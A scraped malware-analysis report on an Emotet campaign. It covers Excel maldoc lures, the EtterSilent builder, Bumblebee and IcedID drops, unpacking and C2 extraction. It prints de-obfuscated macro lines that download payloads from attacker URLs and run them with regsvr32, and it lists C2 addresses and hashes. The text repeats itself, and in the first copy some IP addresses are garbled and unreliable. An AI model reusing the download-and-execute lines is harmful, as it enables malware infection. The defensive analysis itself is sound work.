to one of Emotet’s C2.\r\nThis IP address belongs to the list of C2s extracted from the present sample.\r\nAs far as the persistence mechanism is concerned, the access is maintained on the system by adding multiple keys to the\r\nWindows registry, which will execute the DLL at every restart with regsvr32.exe:\r\n%22%22\r\nFigure 8 Location path of the DLLs are saved in the Windows registry for persistence purposes.\r\nEach key will start regsvr32.exe at the system’s startup to execute the DLLs\r\n%22%22\r\nFigure 9 Commands that will launch the dll at the start of the computer.\r\nAll described techniques (hidden sheets, password protection, white background and characters) and observed attack chain\r\nsuggest that this campaign could be attributed to Emotet’s epoch5 botnet, which leverages the SilentBuilder dropper.\r\nEtterSilent Maldoc builder distribution\r\nAfter having analysed several samples, we concluded from observed commonalities within the maldocs’s metadata (see in\r\nthe Actionable content section) that EtterSilent maldoc builder was leveraged for Emotet’s distribution.\r\nEttersilent was created by a threat actor known as AshkERE on Russian speaking underground cybercriminal forums\r\n(Exploit and XSS). This threat actor appears as the sole seller and developer of EtterSilent (even though a teamwork remains\r\npossible). As a reminder, EtterSilent is a malicious document generator with embedded evasion defence techniques offering\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 9 of 24\n\ntwo types of weaponized Microsoft Office documents (maldocs). The most popular version seems the one leveraging\r\nmacros, which is serving many other threats such as Gozi, IcedID, Trickbot, BazarLoader and Qbot.\r\nEtterSilent came into favour with the cybercriminal community in 2021. Although its first mention dates to 2020, the term\r\nwas really popularized on Exploit and XSS during the spring of 2021. EtterSilent was already considered at that time as a\r\nvery efficient maldoc builder with low detection rates from security tools.\r\n%22%22\r\nFigure 10 AshkERE detailing his social network contacts in order to avoid impersonation, while confirming his presence on\r\nXSS.\r\nThe economic model seems/seemed to be constituted around a subscription offer, which can be purchased by members\r\n(seems to only be possible for five people simultaneously). The threat actor also sold the ‘EtterSilent Encrypt Edition’\r\nbuilder so intrusion sets could operate the tool themselves, offering an unlimited use of the tool for an initial price of 3000\r\ndollars, lowered to 2500 dollars at the end of the operations (on November 30, 2021).\r\nAshkERE is still present today with a similar username on Exploit and XSS and remains an active user even after having\r\nclosed the EtterSilent sales thread. He no longer appears to be publicly selling EtterSilent, but possibly privately.\r\n“Links with other malwares?”\r\nIt is worth noting that a similar Excel document analyzed in this report and used to spread Emotet was also observed to\r\ndeliver additional malwares such as Bumblebee and IcedID, two major players in the current threat landscape.\r\nWhile analyzing the network traffic of such payload upon dynamic malware analysis, a communicating IP address drew our\r\nattention. We indeed noticed the previously seen Emotet C2 (182.162.143%91.%9356) as shown in Figure 11:\r\n%22%22\r\nFigure 11 Excel document with a sha256: 199a2e0e1bb46a5dd8eb3a58aa55de157f6005c65b70245e71cecec4905cc2c0\r\ncommunicating to Emotet’s C2.\r\nBumblebee infection started with a downloaded PowerShell script (‘tps1.ps1’) used to download an additional dll (‘bb.dll’)\r\nassociated with the malware:\r\n%22%22\r\nFigure 12 GET requesting the ps1 file that will later download the bumblebee dll.\r\nThe extracted config from this Bumblebee dll reveals the following information about the malware:\r\nBotnet ID: 0311t2\r\nList of C2:\r\n65.8%91.%93170:443\r\n144.139%91.%93156:443\r\n189.30%91.%93231:443\r\n245.254%91.%93101:443\r\n135.33%91.%93127:443\r\nBumblebee’s configuration is contained inside the .data section of the binary amongst the RC4 encrypted strings. The RC4\r\ndecryption key is hard coded in this section in plain text.\r\nWe then observe that once Bumblebee is executed, the infected machine communicates with a C2\r\n(103.144.139%91.%93156) that was discovered in the extracted list from the configuration.\r\n%22%22\r\nFigure 13 Network traffic showing a connection to one of Bumblebee’s C2s.\r\nWe can also observe connections to an IP address (87.251.67%91.%93168) associated with the IcedID malware:\r\n%22%22\r\nFigure 14 Network traffic showing a connection to one of IcedID’s C2.\r\nThis address resolves the domain spkdeutshnewsupp%91.%93com (see Figure 15) from which we could pivot and gather\r\nadditional hashes of IcedID samples (Figure 16).\r\n%22%22\r\nFigure 15 Packet containing the domain name.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 10 of 24\n\n%22%22\r\nFigure 16 Detection rate (6/95) of this IP address on VirusTotal Intelligence. Several malicious payloads associated with\r\nIcedID communicate with this domain.\r\nFrom a pivot on VirusTotal intelligence we could gather additional IcedID samples hashes that communicate with this\r\ndomain:\r\n05a3a84096bcdc2a5cf87d07ede96aff7fd5037679f9585fee9a227c0d9cbf51\r\n4e79b28215998b57d79a5272e9114eff8fc6ea3c7aac626110d18087c7d1a12b\r\n748c98bd8fe9eaf024481251faa10a0abc631b0fb03758271526d813b57b2567\r\n923715af8f2e49242e18210c143ffd69300cdf675f61ae33c2f2fcbab6df07e2\r\nc58b13dc51e572ec288d97aa255d55884d7418466b8381afd1a4278a0be87427\r\nd3d0e3512bf398aa0699fe1a57cd769fd0ef1801c110aea63c469f7632f36d50\r\nAs far as other types of threats are concerned, a recent report from Proofpoint showed that Emotet is delivering a new\r\nmodule that executes XMRig (the most common Monero miner). Consequently, detecting Emotet often means that the\r\nattack is more thorough than expected and conversely the detection of coinminers/loaders shall not be overlooked.\r\nCode Analysis of a recent Emotet sample\r\nTo better understand Emotet’s recent evolutions and new features, we proceeded to a code analysis of a recent sample of this\r\nmalware Hash of the analyzed sample (sha256:\r\n06b3d3c50da5054b9e37fb6c429c560484be457a09a900b21b5185cf10128ed4). First, we carried on a static analysis of such\r\na sample. The high entropy of the .text section of the binary, as depicted in Figure 17, suggests that this malware is probably\r\npacked. This is also suggested by the presence of randomized unreadable strings in the sample.\r\n%22%22\r\nFigure 17 High entropy of the text section of the binary suggests that it is probably packed as viewed in Detect-it-easy open-source tool.\r\nAt this stage of the analysis, the sample was loaded into the debugger x64dbg to unpack Emotet. For that purpose, a\r\nbreakpoint was set on calls to some Windows APIs such as %22VirtualAlloc%22 (allocating memory). Once this breakpoint\r\nis reached, it is possible to observe in the return of the VirtualAlloc function that the malware allocates memory space and\r\nwrote a binary (MZ) in the RAX register.\r\n%22%22\r\nFigure 18 Memory dump of the RAX register containing the malicious Emotet PE file. Hash of the file (sha256):\r\n04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b\r\nOnce the binary is unpacked, we obtain the final Emotet payload which is a 64bit dll.\r\n%22%22\r\nFigure 19 Disassembly view (left) and pseudocode view (right) of a function returning the C2 IP and port.\r\n%22%22\r\nFigure 20: Another example of those operations.\r\nAt first glance, the static analysis of the dll seems particularly difficult because of the heavy code obfuscation used. Simple\r\nexpressions were transformed into mathematical operations repeated multiple times. Sometimes the results of these\r\noperations are passed in a function that will never be used in the program.\r\nIP addresses and ports of the C2 servers are obfuscated in functions, each of those functions corresponding to one specific\r\nC2. As we can see, instead of having those constants in the code, Emotet’s developers are using a series of logical operations\r\nto build them. However, it is easy to bypass this obfuscation technique since the display of those constants has been\r\nautomatically simplified in pseudocode. Therefore, the effort of the developers of Emotet to hinder analysis of the malware’s\r\ncode appears completely moot.\r\n%22%22\r\nFigure 21 Disassembly view (left) and pseudocode view (right) of a function returning the C2 IP and port.\r\nThis function is referenced in a list of several other functions also containing the IP addresses and ports of other C2.\r\n%22%22\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 11 of 24\n\nFigure 22 Pointers to every function containing C2 information. It is possible to find in this list the function previously\r\nanalyzed.\r\nSince Emotet chose obfuscation over encryption to hide its C2 configuration, we could simply emulate those functions, or\r\neven run them in a debugger to retrieve IP/port information in plain text.\r\nAs far as Emotet 64-bit emulation is concerned, we used “Dumpulator” to emulate the function returning the C2’s\r\ninformation.\r\n%22%22\r\nFigure 23 Emulation result for the given function returns in this example an IP address: 159.65.88%91.%9310 and a Port:\r\n8080\r\nA further innovation of recent Emotet samples lies in the way it encrypts its network communications. Previously, Emotet\r\nwas used to hide its C2 HTTP network traffic via an AES symmetric key encrypted by a hard-coded RSA public key.\r\nEmotet now uses (EDCH) public key. Furthermore, Emotet uses a hard-coded (ECDSA) public key for data validation.\r\nFrom the studied unpacked sample, we could retrieve the following information:\r\nECDH:MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TII\r\nECDSA:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9XoovpqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSP\r\nInfrastructure\r\nThe configurations vary according to the samples and allow us to identify which payload is .\r\nWe cross-referenced these addresses with the command-and-control servers referenced on Feodo Tracker. Some were still\r\nactive while others had been disconnected after being publicly reported. The configurations contained IP addresses\r\nassociated with specific ports (TCP ports like 80 (http) or 443 (https), or on different ports (8080, 7080, …)).\r\nAfter a careful analysis of which service listing on such ports communicate with the payloads, we systematically found a\r\nnginx proxy server. This was deduced from the response headers returned from a simple get request method to fetch data.\r\nWhile trying to find a differentiating element on these servers, we noticed a certain similarity: most of those servers exposed\r\nlegitimate web services next to the service used for command \u0026 control on a different port. These commonalities are\r\nsummarized in two Maltego graphs depicted in Figure 23 and Figure 24.\r\n%22%22\r\nFigure 24 Maltego graph of Emotet’s epoch 4 C2 proxies with legitimate services impacted by vulnerabilities.\r\n%22%22\r\nFigure 25 Maltego graph of Emotet’s epoch 5 C2 proxies with legitimate services and vulnerabilities.\r\nIn addition to exposing legitimate web services, all these servers have numerous vulnerabilities according to Shodan. We\r\nconcluded, with a moderate level of confidence, that these servers have limited security and may have been compromised.\r\nConclusion\r\nThe present report provides a straight-forward and up-to-date analysis of the ongoing Emotet campaign, presently\r\ndistributing hundreds of thousands of emails per day. This investigation highlights notable changes in the modus operandi of\r\nEmotet’s operators (TA545), such as new ways to social engineer its victims to execute malicious documents used to deploy\r\nEmotet. Beyond these new methods leveraged by Emotet for initial access, the present report suggests that the change in the\r\nobfuscation technique of the main payload does not hinder an easy extraction of the configuration of the malware. This\r\nshows that Emotet’s developers may not understand how modern decompilers actually work. We also showed that since its\r\nreturn, Emotet has been seen dropping IcedID and Bumblebee malwares via Epoch 4 botnets. We anticipate that further\r\nvariants and techniques will surface in the future with fewer or greater volumes of spam.\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet as well as some\r\nrecommendations to defend against it.\r\nActionable content\r\nAs we have seen in the main text, Emotet spreaders were forced to adapt and now try to lure users by attempting them to\r\ncopy the maldoc into a whitelisted directory path on the disk. We recommend monitoring any execution of XLS files arising\r\nfrom those directories. It is also recommended to make employees aware of this new technique via sensibilization training\r\nsessions and simulated phishing attacks.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 12 of 24\n\nEmotet is known to be highly polymorphic (i.e., the ability of code to change its identifiable features while maintaining its\r\nfunctionality) and tends to embed more and more threatening modules. Emotet often repacks its dropper and changes its\r\nmodules loaded to stay ahead of signature-based detection solution. Although its functionalities might not vary that much,\r\nthese changes are enough to bypass pattern-matching and footprint detection. More subtle detection (EDR, behavioral\r\nanalysis) would be required to detect the initial infection.\r\nWe draw your attention to one checker and complementary tools:\r\nA relevant free tool to defend against Emotet, which is dubbed EmoCheck, was released a while ago by the JPCERT\r\n(available here on their Github repository). This checker might be relevant particularly for forensics teams when they\r\ninvestigate workstations or servers that might have been infected by Emotet. Emocheck-ReportChecker can also be\r\nhelpful as it generates statistics out of numerous Emocheck reports\r\nAnother relevant tool named EmoKill. This program was inspired from the detection rules of Emocheck and was\r\ncompiled and shared on Github.\r\nTo draft this report, Intrinsec studied commonalities of XLS maldocs sent to Emotet’s victims as spearphishing attachments.\r\nOne common metadata that could be leveraged on VirusTotal Intel for hunting purposes goes as follow:\r\nmagic:%22CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, *Author: Gydar,\r\nLast Saved By: Gydar*, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 04\r\n18:19:34 2015, Security: 0%22\r\nThe code page identifier 1251 refers to Windows Cyrillic-Slavic encoding, mostly used by Russians, Bulgarians, Serbians\r\nand Macedonians. It is also worth noting that all results of the aforementioned query on VT have the same filesize of 255 kB\r\nSeveral SIGMA detection rules could be leveraged to detect an attack by Emotet malware:\r\nDetects network connections and DNS queries initiated by Regsvr32.exe\r\nDetects various anomalies in relation to regsvr32.exe\r\nDetects New Lolbin Process by Office Applications\r\nA YARA detection rule provided by The DFIR Report\r\nTo detect all threats mentioned in this report (Emotet, IcedID, BumbleBee), defenders can also rely on relevant Abuse threat\r\nintel sources such as Feodotracker, ThreatFox and MalwareBazaar as well as the soon available Intrinsec’s IoCs feed.\r\n” content_last_edited=”on|desktop” _builder_version=”4.19.4″ _module_preset=”default” text_orientation=”justified”\r\nglobal_colors_info=”{}”]\r\nOur analysis starts with the first stage of the attack chain that uses a phishing email, more specifically a spear phishing\r\nattachment technique [T1566.001]. For this, we found and analyzed an email sent by Emotet upon a recent spam campaign\r\nthat contains a malicious document (maldoc) attached to the email (see an example in Figure 1).\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 13 of 24\n\nFigure 1 An example of emails which may lead to Emotet malware infection. As extensively seen in the past TTPs of Emotet,\r\nthe latter fakes replies based on legitimate emails stolen from mail clients of Windows hosts previously infected. The Eml file\r\nof sha256: 910731579a78d2da6452bede7dfce8e1f89c285c22d8a7d40db2eafc2fcc45af was retrieved from VirusTotal.\r\nOnce the lured user opens the XLS file, a message box informs them that the document needs to be copied in a specific\r\ndirectory path to display the contents of the file (see Figure 2).\r\nEmotet spreaders are now using a new social engineering technique to coerce the user to copy the Excel file into the\r\nMicrosoft Office Templates folder before relaunching it. This is achieved via a fake yellow graphical ribbon pretending to be\r\nan official Microsoft warning. Because the Templates folder is considered a trusted location according to Microsoft Office\r\npolicy, the malicious macro will run immediately without a security warning (see actionable content and this ref to\r\npreempt the threat at this stage). If you don’t copy the file anywhere, it will still execute the macros as soon as you press\r\nEnable Content in the yellow security warning from Excel (not the fake one in the spreadsheet).\r\nFigure 2 Message box displayed when opening the malicious document. As shown above, Microsoft informs the user with\r\nthe functionality known as Mark of the web (MoTW) forcing Emotet spreaders to adapt. The latter therefore added a specific\r\nmessage to the file, mimicking the Excel security warning (the yellow horizontal bar above the content) and indicating that,\r\nto run the file, it must be placed in the whitelisted Office Templates folder.\r\nIt is striking that Emotet so far has not migrated away from Office macros to other delivery mechanisms like ISO and LNK\r\nfiles. Indeed, many malware families quickly adopted this workaround following Microsoft’s recent announcement that it\r\nwould begin disabling macros by default in Office documents downloaded from the internet.\r\nAt the bottom of the document is usually seen one or several sheets (up to six) with apparent blank cells being password\r\nprotected as depicted in the Figure 3. We expect that this technique could slightly change in the future to evade heuristic\r\nsignatures.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 14 of 24\n\nFigure 3 Excel maldoc with sheet protection added. If only one sheet is apparent in some encountered files, hidden sheets\r\ncan be revealed with a right click option to pursue the analysis.\r\nThe Emotet spreaders relied on a sheet protection measure for the sheets so that the user cannot view the included macro\r\nformula. However, the password protection of Office can be broken via a well-known brute force technique in a reasonable\r\namount of time or via a specific patching procedure. We retrieved the password using the first technique to reveal the cell\r\ncontents and the macro content.\r\nThe password to unprotect the sheets and reveal its content is: AABABAAABBB^\r\nAnother trick to avoid analysis was to scatter and blank data in cells. by changing the color as shown in the Figure 4 so the\r\nXLM macro is not directly readable.\r\nFigure 4 Malicious macro was scattered across the maldoc and hidden thanks to a white font color. Characters can be\r\nunveiled by changing the color of the cells.\r\nUsing Olevba, a free python tool, it is possible to find the cell containing the general formula concatenating the whole\r\ncommand executed upon the excel file opening (see the output result below in the textbox).\r\nSHEET: Sheet6, Macrosheet\r\nCELL:G13, =\r\n(((((((FORMULA(((((((((((((‘Sheet1′!L24\u0026’Sheet1′!L26)\u0026’Sheet1′!L27)\u0026’Sheet1′!L28)\u0026’Sheet1′!L28)\u0026’Sheet2′!F6)\u0026’Sheet2′!N19)\u0026’Sheet1′!F10\r\n0\r\nAnother trick to slow down the analysis was to shrink the column G in sheet 6 as shown in Figure 5.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 15 of 24\n\nIn the present case, a field called “Auto_Open07457358934307593258350725798323209” was also observed. This latter\r\nautomatically triggers the aforementioned formula visible in G13 cell when the workbook is opened (see this ref for details\r\non this old technique).\r\nFigure 5 shows 4 pairs of commands containing de-obfuscated hardcoded URLs which will serve for the second stage of the\r\nattack:\r\n=CALL(“urlmon”,”URLDownloadToFileA“,”JJCCBB”,0,”https[:]//cs.com.sg/Backup/Bk778kXNKMiH5vH/“,”..\\oxnv1.ooccxx”,0,0)\r\n=EXEC(“C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv1.ooccxx”)\r\n=CALL(“urlmon”,”URLDownloadToFileA“,”JJCCBB”,0,”https[:]//j2ccamionmagasin.fr/css/1Mp8y/“,”..\\oxnv2.ooccxx”,0,0)\r\n=EXEC(“C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv2.ooccxx”)\r\n=CALL(“urlmon”,”URLDownloadToFileA“,”JJCCBB”,0,”http[:]//atici.net/old/PkZI74DD/“,”..\\oxnv3.ooccxx”,0,0)\r\n=EXEC(“C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv3.ooccxx”)\r\n=CALL(“urlmon”,”URLDownloadToFileA“,”JJCCBB”,0,”http[:]//clanbaker.org/css/khhl7kT2n69n/“,”..\\oxnv4.ooccxx”,0,0)\r\n=EXEC(“C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv4.ooccxx”)\r\nIn the present case, a CALL function is used to download and save files to the disk, via the function URLDownloadToFileA,\r\nfrom URLs. It is followed by an EXEC function to execute each downloaded file via the living off the land binary (LOLBin)\r\nregsvr32.exe.\r\nFour DLLs were then downloaded from those URLs. Three of these DLLs were copied in %UserProfile%\\AppData\\Local\r\nwith random names in a dedicated folder also having a random name, probably to bypass detection:\r\nC:\\Users\\admin\\AppData\\Local\\ClVoC\\QrGkecuASUzF.dll\r\nC:\\Users\\admin\\AppData\\Local\\WLifsjKOOF\\EUaGZqSKWcHGU.dll\r\nC:\\Users\\admin\\AppData\\Local\\WBoDkXTZxEMvgSGka\\WpRogE.dll\r\nThe LOLBin regsvr32.exe is then used to execute those 4 downloaded DLLs:\r\nFigure 6 The LOLBin regsvr32.exe is used to execute the previously downloaded DLLs.\r\nregsvr32.exe will then communicate with a Korean IP address (182.162.143.56):\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 16 of 24\n\nFigure 7 Networks communications showing direct requests to one of Emotet’s C2.\r\nThis IP address belongs to the list of C2s extracted from the present sample.\r\nAs far as the persistence mechanism is concerned, the access is maintained on the system by adding multiple keys to the\r\nWindows registry, which will execute the DLL at every restart with regsvr32.exe:\r\nFigure 8 Location path of the DLLs are saved in the Windows registry for persistence purposes.\r\nEach key will start regsvr32.exe at the system’s startup to execute the DLLs\r\nFigure 9 Commands that will launch the dll at the start of the computer.\r\nAll described techniques (hidden sheets, password protection, white background and characters) and observed attack chain\r\nsuggest that this campaign could be attributed to Emotet’s epoch5 botnet, which leverages the SilentBuilder dropper.\r\nEtterSilent Maldoc builder distribution\r\nAfter having analysed several samples, we concluded from observed commonalities within the maldocs’s metadata (see in\r\nthe Actionable content section) that EtterSilent maldoc builder was leveraged for Emotet’s distribution.\r\nEttersilent was created by a threat actor known as AshkERE on Russian speaking underground cybercriminal forums\r\n(Exploit and XSS). This threat actor appears as the sole seller and developer of EtterSilent (even though a teamwork remains\r\npossible). As a reminder, EtterSilent is a malicious document generator with embedded evasion defence techniques offering\r\ntwo types of weaponized Microsoft Office documents (maldocs). The most popular version seems the one leveraging\r\nmacros, which is serving many other threats such as Gozi, IcedID, Trickbot, BazarLoader and Qbot.\r\nEtterSilent came into favour with the cybercriminal community in 2021. Although its first mention dates to 2020, the term\r\nwas really popularized on Exploit and XSS during the spring of 2021. EtterSilent was already considered at that time as a\r\nvery efficient maldoc builder with low detection rates from security tools.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 17 of 24\n\nFigure 10 AshkERE detailing his social network contacts in order to avoid impersonation, while confirming his presence on\r\nXSS.\r\nThe economic model seems/seemed to be constituted around a subscription offer, which can be purchased by members\r\n(seems to only be possible for five people simultaneously). The threat actor also sold the ‘EtterSilent Encrypt Edition’\r\nbuilder so intrusion sets could operate the tool themselves, offering an unlimited use of the tool for an initial price of 3000\r\ndollars, lowered to 2500 dollars at the end of the operations (on November 30, 2021).\r\nAshkERE is still present today with a similar username on Exploit and XSS and remains an active user even after having\r\nclosed the EtterSilent sales thread. He no longer appears to be publicly selling EtterSilent, but possibly privately.\r\n“Links with other malwares?”\r\nIt is worth noting that a similar Excel document analyzed in this report and used to spread Emotet was also observed to\r\ndeliver additional malwares such as Bumblebee and IcedID, two major players in the current threat landscape.\r\nWhile analyzing the network traffic of such payload upon dynamic malware analysis, a communicating IP address drew our\r\nattention. We indeed noticed the previously seen Emotet C2 (182.162.143[.]56) as shown in Figure 11:\r\n \r\nFigure 11 Excel document with a sha256: 199a2e0e1bb46a5dd8eb3a58aa55de157f6005c65b70245e71cecec4905cc2c0\r\ncommunicating to Emotet’s C2.\r\nBumblebee infection started with a downloaded PowerShell script (‘tps1.ps1’) used to download an additional dll (‘bb.dll’)\r\nassociated with the malware:\r\nFigure 12 GET requesting the ps1 file that will later download the bumblebee dll.\r\nThe extracted config from this Bumblebee dll reveals the following information about the malware:\r\nBotnet ID: 0311t2\r\nList of C2:\r\n 39.65.8[.]170:443\r\n 103.144.139[.]156:443\r\n 107.189.30[.]231:443\r\n 91.245.254[.]101:443\r\n 194.135.33[.]127:443\r\nBumblebee’s configuration is contained inside the .data section of the binary amongst the RC4 encrypted strings. The RC4\r\ndecryption key is hard coded in this section in plain text.\r\nWe then observe that once Bumblebee is executed, the infected machine communicates with a C2 (103.144.139[.]156) that\r\nwas discovered in the extracted list from the configuration.\r\nFigure 13 Network traffic showing a connection to one of Bumblebee’s C2s.\r\nWe can also observe connections to an IP address (87.251.67[.]168) associated with the IcedID malware:\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 18 of 24\n\nFigure 14 Network traffic showing a connection to one of IcedID’s C2.\r\nThis address resolves the domain spkdeutshnewsupp[.]com (see Figure 15) from which we could pivot and gather\r\nadditional hashes of IcedID samples (Figure 16).\r\n \r\nFigure 15 Packet containing the domain name.\r\nFigure 16 Detection rate (6/95) of this IP address on VirusTotal Intelligence. Several malicious payloads associated with\r\nIcedID communicate with this domain.\r\nFrom a pivot on VirusTotal intelligence we could gather additional IcedID samples hashes that communicate with this\r\ndomain:\r\n05a3a84096bcdc2a5cf87d07ede96aff7fd5037679f9585fee9a227c0d9cbf51\r\n4e79b28215998b57d79a5272e9114eff8fc6ea3c7aac626110d18087c7d1a12b\r\n748c98bd8fe9eaf024481251faa10a0abc631b0fb03758271526d813b57b2567\r\n923715af8f2e49242e18210c143ffd69300cdf675f61ae33c2f2fcbab6df07e2\r\nc58b13dc51e572ec288d97aa255d55884d7418466b8381afd1a4278a0be87427\r\nd3d0e3512bf398aa0699fe1a57cd769fd0ef1801c110aea63c469f7632f36d50\r\nAs far as other types of threats are concerned, a recent report from  Proofpoint showed that Emotet is delivering a new\r\nmodule that executes XMRig (the most common Monero miner). Consequently, detecting Emotet often means that the\r\nattack is more thorough than expected and conversely the detection of coinminers/loaders shall not be overlooked.\r\nCode Analysis of a recent Emotet sample\r\nTo better understand Emotet’s recent evolutions and new features, we proceeded to a code analysis of a recent sample of this\r\nmalware Hash of the analyzed sample (sha256:\r\n06b3d3c50da5054b9e37fb6c429c560484be457a09a900b21b5185cf10128ed4). First, we carried on a static analysis of such\r\na sample. The high entropy of the .text section of the binary, as depicted in Figure 17, suggests that this malware is probably\r\npacked. This is also suggested by the presence of randomized unreadable strings in the sample.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 19 of 24\n\nFigure 17 High entropy of the text section of the binary suggests that it is probably packed as viewed in Detect-it-easy open-source tool. \r\n At this stage of the analysis, the sample was loaded into the debugger x64dbg to unpack Emotet. For that purpose, a\r\nbreakpoint was set on calls to some Windows APIs such as “VirtualAlloc” (allocating memory). Once this breakpoint is\r\nreached, it is possible to observe in the return of the VirtualAlloc function that the malware allocates memory space and\r\nwrote a binary (MZ) in the RAX register.\r\n \r\nFigure 18 Memory dump of the RAX register containing the malicious Emotet PE file. Hash of the file (sha256):\r\n04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b\r\nOnce the binary is unpacked, we obtain the final Emotet payload which is a 64bit dll.\r\nAt first glance, the static analysis of the dll seems particularly difficult because of the heavy code obfuscation used. Simple\r\nexpressions were transformed into mathematical operations repeated multiple times. Sometimes the results of these\r\noperations are passed in a function that will never be used in the program.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 20 of 24\n\nFigure 19 Repeated mathematical operations used for obfuscation.\r\nFigure 20: Another example of those operations.\r\nIP addresses and ports of the C2 servers are obfuscated in functions, each of those functions corresponding to one specific\r\nC2. As we can see, instead of having those constants in the code, Emotet’s developers are using a series of logical operations\r\nto build them. However, it is easy to bypass this obfuscation technique since the display of those constants has been\r\nautomatically simplified in pseudocode. Therefore, the effort of the developers of Emotet to hinder analysis of the malware’s\r\ncode appears completely moot.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 21 of 24\n\nFigure 21 Disassembly view (left) and pseudocode view (right) of a function returning the C2 IP and port.\r\nThis function is referenced in a list of several other functions also containing the IP addresses and ports of other C2.\r\nFigure 22 Pointers to every function containing C2 information. It is possible to find in this list the function previously\r\nanalyzed.\r\nSince Emotet chose obfuscation over encryption to hide its C2 configuration, we could simply emulate those functions, or\r\neven run them in a debugger to retrieve IP/port information in plain text.\r\nAs far as Emotet 64-bit emulation is concerned, we used “Dumpulator” to emulate the function returning the C2’s\r\ninformation.\r\nFigure 23 Emulation result for the given function returns in this example an IP address: 159.65.88[.]10 and a Port: 8080\r\nA further innovation of recent Emotet samples lies in the way it encrypts its network communications. Previously, Emotet\r\nwas used to hide its C2 HTTP network traffic via an AES symmetric key encrypted by a hard-coded RSA public key.\r\nEmotet now uses an Elliptic Curve Diffie-Hellman (EDCH) public key. Furthermore, Emotet uses a hard-coded Elliptic-curve digital Signature Algorithm (ECDSA) public key for data validation. From the studied unpacked sample, we could\r\nretrieve the following information:\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 22 of 24\n\nECDH:MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TII\r\nECDSA:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9XoovpqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSP\r\nInfrastructure\r\nAfter having extracted the configuration of different samples (see previous section), we managed to retrieve several IP\r\naddresses of command-and-control servers with which the payloads communicate. The configurations vary according to the\r\nsamples and allow us to identify which payload is part of Epoch4 or Epoch5 according to its encryption key.\r\nWe cross-referenced these addresses with the command-and-control servers referenced on Feodo Tracker. Some were still\r\nactive while others had been disconnected after being publicly reported. The configurations contained IP addresses\r\nassociated with specific ports (TCP ports like 80 (http) or 443 (https), or on different ports (8080, 7080, …)).\r\nAfter a careful analysis of which service listing on such ports communicate with the payloads, we systematically found a\r\nnginx proxy server. This was deduced from the response headers returned from a simple get request method to fetch data.\r\nWhile trying to find a differentiating element on these servers, we noticed a certain similarity: most of those servers exposed\r\nlegitimate web services next to the service used for command \u0026 control on a different port. These commonalities are\r\nsummarized in two Maltego graphs depicted in Figure 23 and Figure 24.\r\n \r\nFigure 24 Maltego graph of Emotet’s epoch 4 C2 proxies with legitimate services impacted by vulnerabilities.\r\nFigure 25 Maltego graph of Emotet’s epoch 5 C2 proxies with legitimate services and vulnerabilities.\r\nIn addition to exposing legitimate web services, all these servers have numerous vulnerabilities according to Shodan. We\r\nconcluded, with a moderate level of confidence, that these servers have limited security and may have been compromised.\r\nConclusion\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 23 of 24\n\nThe present report provides a straight-forward and up-to-date analysis of the ongoing Emotet campaign, presently\r\ndistributing hundreds of thousands of emails per day. This investigation highlights notable changes in the modus operandi of\r\nEmotet’s operators (TA545), such as new ways to social engineer its victims to execute malicious documents used to deploy\r\nEmotet. Beyond these new methods leveraged by Emotet for initial access, the present report suggests that the change in the\r\nobfuscation technique of the main payload does not hinder an easy extraction of the configuration of the malware. This\r\nshows that Emotet’s developers may not understand how modern decompilers actually work. We also showed that since its\r\nreturn, Emotet has been seen dropping IcedID and Bumblebee malwares via Epoch 4 botnets. We anticipate that further\r\nvariants and techniques will surface in the future with fewer or greater volumes of spam.\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet as well as some\r\nrecommendations to defend against it.\r\nActionable content\r\nAs we have seen in the main text, Emotet spreaders were forced to adapt and now try to lure users by attempting them to\r\ncopy the maldoc into a whitelisted directory path on the disk. We recommend monitoring any execution of XLS files arising\r\nfrom those directories. It is also recommended to make employees aware of this new technique via sensibilization training\r\nsessions and simulated phishing attacks.\r\nEmotet is known to be highly polymorphic (i.e., the ability of code to change its identifiable features while maintaining its\r\nfunctionality) and tends to embed more and more threatening modules. Emotet often repacks its dropper and changes its\r\nmodules loaded to stay ahead of signature-based detection solution. Although its functionalities might not vary that much,\r\nthese changes are enough to bypass pattern-matching and footprint 